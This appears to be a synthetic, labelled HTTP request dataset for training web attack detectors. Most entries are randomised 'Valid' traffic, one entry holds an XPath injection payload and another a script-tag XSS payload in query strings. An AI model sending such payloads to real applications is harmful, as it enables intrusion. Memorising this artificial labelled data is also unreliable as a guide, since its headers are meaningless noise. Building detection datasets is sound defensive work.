Authorization: 2oKd dti7nal=t6ihpnaA
Range: 478892-,53727-
Referer: http://yacgmfa.fr/shea/T9iehg/nguA/5qto/irzwyzdb.pl
TE: trailers,trailers,trailers
Trailer: Upgrade
User-Agent: Mozilla/1.1 (Windows; U; Win 9x 6.7; ae-1d; rv:6.9.7) Gecko/17010190
UA-CPU: Sparc
UA-Disp: 450,4767,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 1443x630
Via: HTTP/0.0 246.35.46.28, 0.1 www.1ahsuaot.html:91308
Transfer-Encoding: ueXs; soereh=woSao
Upgrade: bcdD/5.6, SOfeT/0.6, d9O/4.6
Warning: 672 146.81.253.52 "jtadl" "Mon, 09 Feb 04 19:26:43 CET"
X-Forwarded-For: 236.127.123.213
X-Serial-Number: 01906983974999
----: ----------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 15200
Start - Id: 12364
class: Valid
GET /spde55im04/o0vb8.B6ds@2n0/nOSZ5o5kOeNiQeELb-D/eNvgTmVWY@O7_j/eZd45@aRLUzNpZna/uDzkM/7PA1bZ/meuh/ehceMZgvMti/tYM6i4R2gjUSN9K/losiafvYoe67v2at9amt/dtotea.jpg?UHstylex429ryin=mni8hhewph7lAaa5no&uh=3089913&MAoirtfes2zni=070534&Enj=80&k7altnyta=%7C&M88gkqwRvP=gK09RF&dptsheye=79562&8ygarsrqaAaag=s1a0rp&67llo16dequ5=581&_nIfromreplaceu=t%3Er3%25%3Ceubndp&KHQgtJF=7s4sudmfyeavdrq0r HTTP/1.1
Host: www.7XuTm.org
Connection: keep-alive
Accept: text/*;q=0.5, application/postscript
Accept-Charset: isiri-3342;q=0.2, x-mac-roman, utf-8;q=0.3, x-mac-turkish;q=0.5, x-mac-turkish;q=0.5
Accept-Encoding: 
Accept-Language: nvdts-eo3i;q=0.1, eatosw-Ptedr, t2-serm
Cache-Control: only-if-cached
Client-ip: 102.169.186.69
Cookie: iikdahatde=pZLPpzvl9vXl
Cookie2: $Version="95"
Date: Mon, 16 Nov 09 23:40:52 CET
ETag: W/"iCE5UJcs-dA3J496"
Expect: 100-continue
From: Tnnrip@eam1hohoia.org
If-Modified-Since: Tue, 29 Jan 08 23:37:38 UTC
If-Unmodified-Since: Tue, 01 Apr 08 04:37:00 GMT
If-Match: "PcmYAW9ZVIuOh.0X"
If-None-Match: *
If-Range: "ylvpmcLVj-cjGNOMH-xT"
Max-Forwards: 0063
MIME-Version: 2.4
Pragma: NhslnHes='eofihn'
Proxy-Authorization: NTLM c2FCOXNTaXRydUJvWHRlY3poZEQybmF0c3lkdGNlNGNkdG9qZWJEV3luZWxiaXR2
Authorization: Digest realm
Range: 662-4,8147-,483669-546
Referer: /wgee/tqadlvxh.pdf
TE: gzip;q=0.2
Trailer: User-Agent
User-Agent: Mozilla/0.3 (X11; U; Unix 3.6; un-tm; rv:0.0.0) Gecko/81694873
UA-CPU: 68000
UA-Disp: 3711,172,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 8258x863
Via: 4.6 www.eTed.jpg, HTTP/7.1 106.213.99.116
Transfer-Encoding: t1qhe
Upgrade: oE2te/7.8, Hstma/8.3, oi5ia/6.9, iXetpi/8.4
Warning: 713 www.kooge.htm "s9oterkw" "Fri, 20 Feb 09 09:08:07 CET"
X-Forwarded-For: 202.158.102.83
X-Serial-Number: 250138591797251529
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12364
Start - Id: 26736
class: Valid
GET /aHchOv5AMD/SH/qhli7/dhM/kpffoveTimeeVil/st1f80Od.jlRxjUIXw-/2jMIOO/vNztC5hvZ8K/13WJ4guQh/zRabanpdAxneb0naeud.nsf?j80saene7s5ss=9&ChfxtcRr7ar=4293460092&D3KVMKsDIposition=o%27+w&replaceLwindow.openYN=05057&nliwlentEni=nr- HTTP/1.1
Host: www.ymdenEifff.fr
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-arabic, windows-1254;q=0.5
Accept-Encoding: deflate;q=0.6, identity, gzip
Accept-Language: *
Cache-Control: no-transform
Client-ip: 45.72.135.228
Cookie: oh1taaYt1qirR=0998170468;ySo1wXxp_9jshutdownnr=~;9nh=wsng;bPC@5=ePh8PEpE.AoE
Cookie2: $Version="018"
Date: Thu, 27 Mar 08 04:30:26 CET
ETag: W/"zKHC5oP1_ptrfqFVg"
Expect: tyhinr
From: slnt@rItzvIc.net
If-Modified-Since: Fri, 12 Oct 07 08:32:40 CET
If-Unmodified-Since: Mon, 18 Jan 10 14:01:57 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 800
MIME-Version: 1.9
Pragma: no-cache
Proxy-Authorization: Basic aGV3U2NuOnNtMWdvcGU=
Authorization: NTLM ZW4wbm15aFViaW1yNG96cmFSemV3dzFvb3J1bm9nYXIzaw==
Range: 5-
Referer: /tat8AR3s/sahtbsU/jzelcdb/citNBec/a2maoiUi.jpeg
TE: deflate;q=0.0,trailers,trailers
Trailer: Accept-Encoding
User-Agent: okthaesah/2.7.3.5
UA-CPU: StrongARM
UA-Disp: 212,9655,8
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 358x270
Via: 2.6 221.88.115.166, 2.1 249.35.70.127:821, FTP/1.9 92.134.42.32
Transfer-Encoding: identity
Upgrade: mrep/3.9, HDF/3.4, hmg/9.6, cFeer/0.4, nbtig/3.6
Warning: 653 www.rIlbwe.html:51762 "pn4htodnstaeHz" "Sat, 18 Dec 04 07:27:35 UTC"
X-Forwarded-For: 43.146.116.9
X-Serial-Number: 1194043277645
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26736
Start - Id: 48881
class: XPathInjection
GET /aE@glaYYP3Is3e9Ch19/htio2qm.swf?ehdcey3x=aMjR&sEesxseOh7=95640370&ynmtgnhgC=5&4dsetc4Mql8=26+or+1%3C++lt%2Fau%2Fv%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D50%5D+++or+5676%3D%27%5D+%7C+%2F*+%7C+%2Ffoo%5Bbar%3D%27&pntt=t37&hFAt=28&Tcdsloabe=lc&2GVtelnetDcconnectrcpIse=994 HTTP/1.0
Host: www.omiT0Etc.fr
Connection: close
Accept: */*
Accept-Charset: iso-8859-4, x-mac-japanese;q=0.3, windows-1255;q=0.4, big5, iso-2022-kr;q=0.6
Accept-Encoding: gzip;q=0.2, compress, identity;q=0.5, deflate
Accept-Language: *
Cache-Control: max-age=780
Client-ip: 220.116.206.243
Cookie: Luoe=012706159;eisRlenro7Ao=e4oes?gis ;nedraOriol=98;au=aua1i;v.0pVNLvhB2=1ahtpaxduTsr
Cookie2: $Version="4"
Date: Tue, 02 Nov 04 22:53:10 GMT
ETag: W/"Mj-Eio7TkEq3Umg"
Expect: 5iusOoAi
From: nhrer@c9ndnn.gov
If-Modified-Since: Tue, 12 Sep 06 03:58:56 CET
If-Unmodified-Since: Fri, 19 Dec 08 10:44:08 CET
If-Match: *
If-None-Match: "xZBam07P2VwFIbTCYU"
If-Range: Sun, 27 Sep 09 23:27:54 CET
Max-Forwards: 1943
MIME-Version: 4.6
Pragma: no-cache
Proxy-Authorization: dyscrl o8iQnhe=rsca
Authorization: Digest realm
Range: 41-,-69
Referer: /hatu/nKas/pmicn6/rayiTs/HeTt.conf
TE: gzip,trailers,deflate
Trailer: Accept-Charset
User-Agent: Mozilla/7.7 (X11; U; Open BSD i586 8.9; nq-eD; rv:3.0.1) Gecko/40044366
UA-CPU: MIPS
UA-Disp: 184,1119,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 1420x8323
Via: 7.7 97.121.81.243, cued/7.1 www.febo.tiff
Transfer-Encoding: dvsA
Upgrade: w3tl/4.7, o4Ow/6.6
Warning: 480 www.ecyoFapf.png "7ig9dLsenpztbewo" 
X-Forwarded-For: 89.218.173.144
X-Serial-Number: 3294435
----: ------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 48881
Start - Id: 27938
class: Valid
GET /doltoop5rjUb2e/ipseirbasalhiyis/aehorborxpttihcners/46rmodtnenig/qh.vjpX-RtLHQ4jr/e7emY-y/ekDbheoubTeD96hmfoOe/2aTDYKVNIGWqegRf-P.dll?hjhxned=893656378&jDtP=aum&cdX.Vz-OU42I=rmid%5CtudrVyed88&includecechoKhWx4H9L=5905678&gten32ahhd3oEh=ppfN&tluniZ0dsola=hEt&sg1iAc=sjs_&lzbnfieuoltstxs=eh4VdmqP HTTP/1.1
Host: www.syud9c8em.com:7
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: windows-1253, windows-1255, x-mac-cyrillic;q=0.6, x-mac-chinesesimp
Accept-Encoding: *;q=0.0
Accept-Language: *;q=0.6
Cache-Control: n='rjtt'
Client-ip: 115.171.171.121
Cookie: 7vZrTiaaeac=as3km;a5iuu6CWnflRtn=360942
Cookie2: $Version="5"
Date: Tue, 15 Sep 09 06:33:21 UTC
ETag: "ioGj.SWMOaK1l.Z4w"
Expect: 100-continue
From: aclt@ntyaoohns.cz
If-Modified-Since: Fri, 08 Dec 06 17:32:26 GMT
If-Unmodified-Since: Thu, 02 Apr 09 24:20:43 GMT
If-Match: "Xg-uXRANzFBMesQ1SmXM"
If-None-Match: "H57c2nQtuwup@WJtwy"
If-Range: *
Max-Forwards: 611
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: aseiIS htdyI=sragn
Authorization: Basic NHRuZWNvOmVodG9kY3N2
Range: -14621,-370256
Referer: /eol3n/nmwffynl/lptbe.sh
TE: trailers
Trailer: If-None-Match
User-Agent: Mozilla/8.4 (Machintosh; U; Mac OS X 1.1; hI-el; rv:6.3.9) Gecko/94545975
UA-CPU: Sparc
UA-Disp: 666,785,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 0093x2454
Via: 2.9 125.82.169.76, 6.1 www.ducn.png:73258, 9.3 165.226.137.83
Transfer-Encoding: gzip
Upgrade: hrdi/7.3, pbnr/9.0, Etitb/6.6, cut/3.8
Warning: 832 59.92.226.57 "4ttWsncayb0" "Thu, 06 Dec 07 08:46:18 CET"
X-Forwarded-For: 122.177.179.211
X-Serial-Number: 149066712456
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27938
Start - Id: 15438
class: Valid
GET /t3IOcC/atSgNf8x-FYHoS_Ih/Wg4optrg/h04hge0ouosLmr/ntgF7OK3HA/bg4dzM2-mVA32FsoZ-pv.gif?Zxc015=82 HTTP/1.1
Host: 123.220.220.13:67
Connection: sttnh
Accept: audio/x-wav;q=0.3
Accept-Charset: *
Accept-Encoding: *;q=0.5
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 104.139.105.118
Cookie: 0o0oop=ew@;e8=<ee;ioole=vbmeloaHtatIfpYn
Cookie2: $Version="373"
Date: Fri, 14 Dec 07 10:02:37 UTC
ETag: W/"XrIK5Z@E08iUctci2yO"
Expect: o00to=jrir5a;telilZd
From: hreEo@mhtthLrava.org
If-Modified-Since: Wed, 26 Jul 06 12:53:47 CET
If-Unmodified-Since: Fri, 26 Sep 08 16:28:14 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 19
MIME-Version: 1.7
Pragma: no-cache
Proxy-Authorization: Digest uri=http://eoSaio.ch/paao9/eapN/amw5eew/aeif8h.sh
Authorization: NTLM ZXNmNmVvdThub2Vob3NzZmhvOGNzSXRodGRpTW5MaHI=
Range: 4188-,1306-94985
Referer: http://www.huagoh2o.net/a7Lr.gz
TE: chunked;q=0.0,deflate;q=0.1
Trailer: If-Match
User-Agent: Mozilla/3.7 (Machintosh; U; PPC 6.7; mi-ue; rv:9.5.8) Gecko/47961077
UA-CPU: PowerPC
UA-Disp: 0411,934,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 8272x2964
Via: HTTP/8.0 224.237.96.240, 8.5 89.220.232.178
Transfer-Encoding: identity
Upgrade: oaai/4.0, e9n6fi/8.4, Gqhe/6.6, n3iid/9.5, y6n9/2.9
Warning: 865 www.btsmfeds.js "eterOr" 
X-Forwarded-For: 180.18.29.73
X-Serial-Number: 4215361371193474
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15438
Start - Id: 29170
class: Valid
GET /m-3Fm-opVblq6Y.shtml?pelvyoreczSradn=t+&riczrsi8oet=79179724&eedt7oElso3Fpom=a&imihesN=%27wiokajbsoEa5sn&jseu90nk0os=%28+a HTTP/1.1
Host: www.Pwscc.uk:1162
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-9, iso-10646-ucs-2;q=0.0, windows-1252
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 36.255.188.145
Cookie: fAkoeao=c2tit;ioeaErtirce=rit yslo;wu1aeytOcwilqeh=75337;0ulohfdau1enan1=cabgsoundjaH1update~%vu3open;y5ssitgt=97;de=oDfaTlarTTn0
Cookie2: $Version="92"
Date: Mon, 27 Jun 05 18:13:00 GMT
ETag: "YCTQmjB5LiaZi1Z"
Expect: setyra
From: isid9g@sdnytymhq.st
If-Modified-Since: Sat, 03 May 08 04:38:08 CET
If-Unmodified-Since: Thu, 19 May 05 07:37:53 CET
If-Match: "QA7Y8mAKS7FOu2ZWRm"
If-None-Match: *
If-Range: Mon, 02 Apr 07 04:59:53 GMT
Max-Forwards: 90
MIME-Version: 3.7
Pragma: no-cache
Proxy-Authorization: Digest username="b3ezen4"
Authorization: NTLM ZTVldXB3cjhub28xaWlVaGh0YXR0cnZyc25uZHBhZXNlUjhrZWNxbkdmaE5hbWU=
Range: 21-228505,111-,03195-
Referer: /loEEssro/nefa/dmee/Dlew/tyOvh.mdb
TE: chunked;q=0.6
Trailer: Date
User-Agent: Mozilla/7.1 (Windows; U; Windows NT 0.7; 1h-sz; rv:7.0.5) Gecko/62128662
UA-CPU: PowerPC
UA-Disp: 2553,984,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 0871x656
Via: iprs6/9.0 www.at0Ewmd.js, FTP/9.2 115.231.36.230
Transfer-Encoding: compress
Upgrade: esihx8/9.4, oom/5.8, rliD6z/3.5, eqnao/3.0, hone/5.5
Warning: 708 56.218.81.142:38202 "p3Rsenoiem43hyao" "Sat, 16 Jun 07 21:36:47 GMT"
X-Forwarded-For: 244.72.112.222
X-Serial-Number: 59543
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 29170
Start - Id: 14365
class: Valid
GET /kaditpbrbamedh/Xtilsm5ouHkp4/slCl5SqBer/8lnubSshecCrfhetisZ/otete5rlarpz7Etee7o.css?sred9ol=udTf9oieEi&allselectdRO--=9spoh%24N%25neeyeamexec&7suNghe=%26csghttpssdlahSp8&eSeIchhhebavp=bwXrOluw&e7E=Iiams&ustearo0km=hefuPYdabc1&ttfanlsua=lOKdl2%40To9X&oyLsbsRxpsso=hdlesneu9o&OtpevalmNfV=liI1JBql&qn7rhedt=beincmei4s&2tdhttpTfHE50W=avQressie&kdw3daulceRey=bPzWM&ZBf1=3&llrz=iarseeiO&len=tc HTTP/1.1
Host: 30.118.195.247
Connection: close
Accept: */*;q=0.3
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: cee=nier
Client-ip: 116.30.82.245
Cookie: tateAhs6ztg='|oscriptg;hoe=5;aoe8nlhthanrssl=o%;le=utz0RedhonCoalq3ou;ihjn=nI;ngseIr=h@LJ
Cookie2: $Version="06"
Date: Wed, 19 Sep 07 20:53:53 CET
ETag: "7njj5OVoZqM.3eQk5x0"
Expect: 100-continue
From: Esys@smxt.fr
If-Modified-Since: Tue, 06 Jan 04 18:39:39 CET
If-Unmodified-Since: Sat, 28 Jun 08 10:54:09 GMT
If-Match: "jnabUxTlGPWS.NNRrP_"
If-None-Match: *
If-Range: *
Max-Forwards: 93
MIME-Version: 4.9
Pragma: no-cache
Proxy-Authorization: are8Hq iWu7=vneaiwu
Authorization: Digest username="hoio"
Range: -8,95-
Referer: http://tit1.st/sEhe/m7tq/l0ek/uEihyRa.js
TE: deflate
Trailer: Accept
User-Agent: Mozilla/0.9 (X11; U; Linux i586 9.7; ir-Te; rv:5.7.6) Gecko/36155220
UA-CPU: PowerPC
UA-Disp: 566,1872,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 8463x313
Via: 1.8 www.ohsa3.js, 8.5 www.ursNidq.jpeg:75, 3.6 www.u9je.jpg
Transfer-Encoding: gzip
Upgrade: wheId8/6.7, oho/8.8, eubuhs/7.6
Warning: 602 www.usoFyOoy.jpg:8520 "Eoitcrxehi3nma6uas" "Wed, 04 Jul 07 21:38:06 GMT"
X-Forwarded-For: 54.65.208.97
X-Serial-Number: 97794258051819515
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 14365
Start - Id: 19293
class: Valid
GET /4isl6lenhIeseotnbrjm/H9SIfls/lCW/IkedecnoemetS/aiaeferthsen/aSeaAnirtbbaG7s/8yolNiR2ignhose/Nnovusosi53cE/sK2R.NWkut-54C/a0dbFbRXr/piSur.sh?heosd=-i&nszj78ed=h3mfitt&jieE1ennIEi3=3ye%24&tmpchild-dwp-VR38CI=6&emw=0876&nepoytm=357 HTTP/1.1
Host: www.snae.cz
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: x-mac-arabic;q=0.8, utf-8, x-mac-japanese;q=0.3
Accept-Encoding: identity, gzip;q=0.2
Accept-Language: rI-ltsOThtt, dAasno-3t4mdt, Roeeho-seesty;q=0.5
Cache-Control: 6yspez=Ips
Client-ip: 226.51.34.44
Cookie: ntilher3nOeW9d=o@_JGwvf0C9;xtisM=3;1otrsevrahOas=rhtgK
Cookie2: $Version="29"
Date: Sat, 09 Jul 05 22:38:23 GMT
ETag: "gqrkG_IDYk7lrKmy"
Expect: 100-continue
From: eiioel@i3bTr2frih.st
If-Modified-Since: Tue, 26 Jan 10 16:57:17 CET
If-Unmodified-Since: Thu, 17 Jul 08 03:21:10 UTC
If-Match: "PDCSYzR.YFemc87"
If-None-Match: *
If-Range: Thu, 15 Oct 09 19:33:33 CET
Max-Forwards: 3
MIME-Version: 3.1
Pragma: b='ci'
Proxy-Authorization: Digest opaque="mfshcta"
Authorization: Basic c2l1YTp2ZWUxQQ==
Range: -20,41926-83
Referer: http://ayitdOf.st/eeren0.pl
TE: deflate;q=0.5,trailers
Trailer: Cache-Control
User-Agent: ietumtRopr (7KSCHdJHV; t3Pmpt; s-s_3Ue_p)
UA-CPU: 68000
UA-Disp: 4381,601,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 7027x5675
Via: gdutph/7.1 171.71.96.245, 5.9 www.norrdie.jpeg
Transfer-Encoding: deflate
Upgrade: earoeu/7.9, ifetz/3.5, tges/2.9, Heu/7.4, ihfoks/9.4
Warning: 303 143.220.33.216 "entfvdtChoEcrKgtdi8" 
X-Forwarded-For: 246.243.162.43
X-Serial-Number: 0947873125180577061
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19293
Start - Id: 245
class: Valid
GET /aiesealevneaakwfn.swf?tnswtAaow=%5Bhia%7E&ihttsar=ejI8r&MFujmFFz=1749&tk=x%27nnTYn%2F3O+on%2Fe&tvsit=2vscowll&vs=lkeyiaf5%3Aoroh87&etI9nel16ryta=Ptydcebesr%3E&beaa7ldceycalah=0B2ri&iiopse=euh&ubrctLsornojeCs=o+&Wc8=0&98gdusmya=ma1ek&qEese9=ttudyeeaqempe&oAn3NyitPw=E4j HTTP/1.1
Host: 28.253.101.125
Connection: keep-alive
Accept: */*
Accept-Charset: koi8;q=0.8, cp-932;q=0.5, isiri-3342;q=0.6, windows-1258;q=0.1
Accept-Encoding: compress;q=0.1, identity;q=0.3
Accept-Language: *;q=0.4
Cache-Control: no-transform
Client-ip: 69.214.106.13
Cookie: ioei9=iee;geigaOhpee=ish
Cookie2: $Version="87"
Date: Wed, 07 Oct 09 04:07:23 UTC
ETag: W/"o-gjpjfrrHp3qFe"
Expect: Teme
From: yeXhbouc@7trpphie.it
If-Modified-Since: Tue, 31 Oct 06 08:21:23 CET
If-Unmodified-Since: Thu, 12 Apr 07 02:08:27 CET
If-Match: "oqauhEcZMnARy9EPU"
If-None-Match: "pinz7svYU5R6K@3EO6_"
If-Range: *
Max-Forwards: 9801
MIME-Version: 2.7
Pragma: no-cache
Proxy-Authorization: Basic dnNzYXltZDp3aHV4MGJndA==
Authorization: Basic dGFydDppZW5zNmE=
Range: 99303-6
Referer: http://www.Sdoshr.it/qih4.avi
TE: trailers,chunked;q=0.9,deflate
Trailer: Cache-Control
User-Agent: ak8hZhC http://www.a8yst.cz
UA-CPU: StrongARM
UA-Disp: 887,741,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 4622x2387
Via: HTTP/9.7 16.206.66.8
Transfer-Encoding: gzip
Upgrade: s0xkh/1.0, aoohr/0.2, neh/8.7, kmSce/3.3
Warning: 564 18.22.111.11 "soshftojabnnOr7rjean" 
X-Forwarded-For: 73.229.35.89
X-Serial-Number: 388092866322
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 245
Start - Id: 22650
class: Valid
GET /t_SFSN.AF3SmlRwJaPA/oY9ilZPgvGFaw/UaelaitiX8snxs6odneu/i@/bCGg3KPCXfd/iroa7g/it/pVrwI/eHodAieIh.cfm? HTTP/1.0
Host: 55.176.27.46:02
Connection: close
Accept: audio/basic;q=0.9
Accept-Charset: euc-kr;q=0.0, euc-cn;q=0.8, windows-874, iso-2022-jp;q=0.5, utf-8;q=0.2
Accept-Encoding: 
Accept-Language: iOnoya-oej;q=0.4, oAe-thjidsae;q=0.4, e3-7emEtrt
Cache-Control: no-store
Client-ip: 113.52.51.66
Cookie: oloatzeElewso=nsl4aaons2U4hnnf;KCzlFY-nDbsw=4Q.UwItWk5iN;eesAxNN=5974098;qwhereifiZ2=aNXpwlQ5Bq9T;sate6l=g06RJa;7Zo9=sFCHcVbuA3.
Cookie2: $Version="25"
Date: Sun, 26 Apr 09 01:43:11 UTC
ETag: "Td6OffvrQT7wOza-"
Expect: 100-continue
From: aeteiv@dttlm6ae.org
If-Modified-Since: Sat, 01 Sep 07 05:32:35 CET
If-Unmodified-Since: Sat, 08 Dec 07 05:19:06 GMT
If-Match: *
If-None-Match: "fH213WOfWvGVZSb5"
If-Range: Thu, 04 Feb 10 05:12:51 UTC
Max-Forwards: 61
MIME-Version: 0.5
Pragma: c5da='5o'
Proxy-Authorization: Digest opaque="3Fcmat"
Authorization: Basic RUVpTkRsOnN6ZDRp
Range: -90,875288-005,-25771
Referer: http://www.iLEhncon.it/nltee/y28l.rar
TE: gzip;q=0.2,deflate
Trailer: Date
User-Agent: rceeel7 (nou20a; hQrwP@E0; ezKU7Hx; r.rSYWoO)
UA-CPU: Sparc
UA-Disp: 1998,0662,8
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 3487x525
Via: 0.4 www.cda3qi.js:28, mieh/7.3 www.oilped.css, mw11nl/4.3 17.120.23.16
Transfer-Encoding: compress
Upgrade: bdtoka/5.6, oh6n/9.8, oq9ry/4.2, eic/9.3
Warning: 577 www.bnimg.jpeg:110 "ifttahve" "Fri, 14 Jul 06 14:00:28 UTC"
X-Forwarded-For: 23.196.24.89
X-Serial-Number: 732034
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22650
Start - Id: 16356
class: Valid
GET /enteqrp.pl?RoEncUtcp=e9e&orsneLxrao=31935302&nxndaW8M0sc=gsEwGwK.ewX&execVFYblMSv=bttmjadeletewgfwax3tmas%25&wZcjhnglra=sfe%3Dpassthru&FR99O87h=s HTTP/1.1
Host: www.nSdjshud.cz
Connection: close
Accept: */*;q=0.6
Accept-Charset: *
Accept-Encoding: identity;q=0.3, gzip;q=0.0, identity;q=0.3, deflate;q=0.0
Accept-Language: Pr-hfdc;q=0.3, rceSle-74id;q=0.1, 2a-r7tam;q=0.5, d-Qnsg;q=0.2, uenxoeor-rlqa
Cache-Control: no-store
Client-ip: 152.145.48.14
Cookie: etThhpYram=I6o;9coslipeaeFhoni=40
Cookie2: $Version="308"
Date: Fri, 29 Oct 04 15:12:22 GMT
ETag: W/"gxr_NsvJNHs7kUt3"
Expect: 100-continue
From: ecDNddEy@dflrto.st
If-Modified-Since: Wed, 14 Apr 10 12:03:25 UTC
If-Unmodified-Since: Sat, 07 May 05 20:15:12 CET
If-Match: *
If-None-Match: *
If-Range: Wed, 25 Nov 09 05:26:22 CET
Max-Forwards: 179
MIME-Version: 3.9
Pragma: no-cache
Proxy-Authorization: NTLM dGJlcjJlb1l3ZW9hc25zZHJlMHQ5ZW5pZkRuTGRsaWU=
Authorization: NTLM b2VlZWdpa2gyeGV4ZWQ2dEVmdjdyaGZPaGxweW1kY2l0Y2h1YWR0aW93
Range: -652120,9-,091-
Referer: /hwmsd/tini.bin
TE: chunked
Trailer: Accept-Charset
User-Agent: lPIcfy9 http://www.sensu.biz
UA-CPU: x86
UA-Disp: 195,2226,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 942x4490
Via: 6.3 45.58.139.69, let/5.1 227.196.90.227
Transfer-Encoding: identity
Upgrade: oE3e1/2.9, FMnex/9.0, o72ibo/5.9, dtimd/8.4
Warning: 799 www.moaimt.jpg:7272 "O1enqniO8" "Mon, 09 May 05 14:13:25 CET"
X-Forwarded-For: 33.237.44.240
X-Serial-Number: 87401
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16356
Start - Id: 47727
class: XSS
GET /S9location-f0openYzUywhtaccesdropbgsound.html?ascwelNrofohl=ea8as&rfoal4=j&re=divzdw0haodto+lm&nrp9ae=1886665618&li0nt=%3C%3Cscript%3E%5Balert%28%27siAcrNhTo%27%29%3B%5D%3C%2Fscript+%3E&erstger=hezneddlneawl&E3DgIfsdNcakxa=6&sTmkIkprbBms=8 HTTP/1.0
Host: www.7P5pl.it:80
Connection: keep-alive
Accept: text/*;q=0.2, image/*, audio/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 90.114.63.204
Cookie: paAdNAonlssnwe=06965;Manr=&eryfe/;services@gXLoI=9
Cookie2: $Version="622"
Date: Wed, 13 Dec 06 20:11:15 UTC
ETag: "3NoB8gEdJ4qpGAoUK"
Expect: 100-continue
From: aonie0x@uTdtewu.be
If-Modified-Since: Mon, 22 Mar 04 09:50:18 GMT
If-Unmodified-Since: Thu, 09 Sep 04 16:51:26 UTC
If-Match: "u1K2pNZvaHrB.1g_"
If-None-Match: "gga56pZViP-pPxuf@g8W"
If-Range: Thu, 21 Dec 06 21:53:46 CET
Max-Forwards: 0
MIME-Version: 5.9
Pragma: Ne='SeAeW'
Proxy-Authorization: Basic bW9hcmE6QWN5c2JlZXM=
Authorization: ep9mla t3deafei=hrshcr
Range: 2174-,56-,-57382
Referer: http://6iee9e.biz/eexit/gseus/ikc4o2wi/tnei8eod/5tobh.asp
TE: trailers,trailers,gzip;q=0.4
Trailer: Date
User-Agent: Mozilla/5.6 (Machintosh; U; PPC 7.2; e0-5i; rv:4.3.6) Gecko/74543508
UA-CPU: PowerPC
UA-Disp: 2301,334,8
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 0710x100
Via: HTTP/0.6 www.oatmc.gif:2
Transfer-Encoding: gzip
Upgrade: dkl9/3.1, Y30iPN/9.5, ieat/6.0, mjwRi/1.0
Warning: 499 www.ObTif.js "Thryti" 
X-Forwarded-For: 1.179.155.203
X-Serial-Number: 89188723783
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47727
Start - Id: 18112
class: Valid
GET /5n/pll8.htm? HTTP/1.0
Host: 16.53.166.34
Connection: close
Accept: */*;q=0.5
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: A-lPst5D;q=0.4
Cache-Control: eas7ue=nasous
Client-ip: 137.32.39.62
Cookie: s8eihswq=uncsdimnew;t4s7t0=dmYE
Cookie2: $Version="192"
Date: Sat, 30 Apr 05 17:55:02 UTC
ETag: W/"fuXBEtERaZdePjWV"
Expect: 100-continue
From: oecjtte@aJits.ch
If-Modified-Since: Sat, 30 Jun 07 15:17:11 UTC
If-Unmodified-Since: Wed, 10 Oct 07 21:53:45 UTC
If-Match: "4McK6lZHLyV7kJF"
If-None-Match: *
If-Range: Sat, 25 Feb 06 03:52:38 GMT
Max-Forwards: 824
MIME-Version: 8.1
Pragma: a='cmel'
Proxy-Authorization: Basic YWhnZGE6bmlpN1R0
Authorization: 5t8b eeii9=drtEA1Cw
Range: -232
Referer: /Re9sf/m5eGn/t1set/kif6tOcn.dll
TE: trailers,trailers,gzip
Trailer: Accept-Encoding
User-Agent: Mozilla/6.4 (Windows; U; Win98 8.4; 9o-rN; rv:0.8.2) Gecko/78868012
UA-CPU: Sparc
UA-Disp: 2247,5505,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 259x791
Via: HTTP/2.5 www.ur8s9y0.shtml, FTP/3.9 163.167.211.60:421, 1.5 213.144.38.235
Transfer-Encoding: gzip
Upgrade: znt/3.0, kesrge/7.5
Warning: 285 108.191.36.249 "oeiebe4a" 
X-Forwarded-For: 7.193.95.179
X-Serial-Number: 818072952381662681
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 18112
Start - Id: 18526
class: Valid
